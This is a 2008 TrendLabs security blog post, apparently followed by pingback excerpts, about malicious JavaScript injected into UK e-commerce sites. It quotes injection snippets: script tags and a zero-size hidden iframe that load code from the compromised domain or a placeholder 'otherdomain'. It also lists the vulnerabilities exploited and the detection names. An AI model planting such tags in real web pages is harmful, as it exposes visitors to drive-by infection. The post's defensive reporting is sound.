TrendLabs received reports of a massive attack against legitimate e-commerce Web sites, particularly in the U.K., with one or two references to Dubai, UAE. These Web sites are injected with the following malicious JavaScript code, which takes advantage of several vulnerabilities to infiltrate an unsuspecting user’s system:
<script language=’JavaScript’ type=’text/javascript’ src=’{random name}.js’></script>
The random file name of the said JavaScript brings difficulty in searching for more compromised pages. Add to that the fact that said JavaScript is hosted in the compromised domain itself.
This routine is unlike other compromises where Web sites are usually injected with either a malicious iFrame link or found to host a JavaScript in _other_ domains usually created and registered solely to host the malicious code or payload for these types of threats. For example:
<script language=’JavaScript’ type=’text/javascript’ src=’http://otherdomain/maliciousscript.js’></script>
or
<iframe src=http://otherdomain/maliciouspage.html width=0 height=0></iframe>
The following are some of the known vulnerabilities that this JavaScript exploits:
- AOL SB.SuperBuddy.1 ActiveX Control Remote Code Execution Vulnerability (CVE-2006-5820)
- Apple QuickTime {qtl} File Handling Remote Command Injection Vulnerability
- GomWebCtrl.GomManager.1 ActiveX controls (GomWeb3.dll) OpenURL() Buffer Overflow
- Microsoft Internet Explorer daxctle.ocx KeyFrame Method Memory Corruption
- NCTAudioFile2 SetFormatLikeSample ActiveX Buffer Overflow
- WebViewFolderIcon ActiveX control vulnerability (Exploit-CVE2006-3730)
However, this is not the case here. Security researchers are still baffled by this event.
Users infected with this malicious JavaScript ultimately download a malicious .MOV file and Trojan programs onto their computers. Trend Micro detects the malicious JavaScript as JS_IESLICE.AQ and the malicious .MOV file as a variant of XML_HACK. The downloaded Trojan programs are detected as TROJ_DROPPER.NH and TROJ_AGENT.HJS.
As we know, motivation behind cyberattacks nowadays is always driven by money. This is just a first in a long series of e-commerce-related invasions that will occur in 2008, if companies and users don’t take extra measures in securing their online businesses. Keep your software updated and be extra vigilant in doing business online… It’s still not too late to add another resolution for ‘08.
Trend Micro Research Project Manager Ivan Macalintal says that this compromise is still under investigation. He adds: “Updates will be posted as soon as new information arrives so you better stay tuned!”
Many thanks to Mary Landesman of ScanSafe for providing the initial report on the topic
January 15th, 2008 at 12:26 am
[...] 參考資料: Mass web infection leaves researcher scratching her head Hackers turn Cleveland into malware server Mass Web Infections E-commerce Sites Invaded [...]
January 24th, 2008 at 1:53 pm
[...] around for all you windows users out there. There’s discussion on it at Linux.com, WebHostingTalk, TrendMicro, and the Internet Storm Center. I have verified our server has not been infected. It does seem to [...]
February 23rd, 2008 at 3:00 pm
[...] Also read this! To help us solve that puzzling question, Dan Goodin at The Register generously wrote about the challenges of this attack, and that article has prompted much useful discussion. It’s also helped foster a great deal of cooperation from some of the impacted hosts and site owners; cooperation that will be key to solving this puzzle. And it’s also led to additional exposure and discussion of the problem here and here. [...]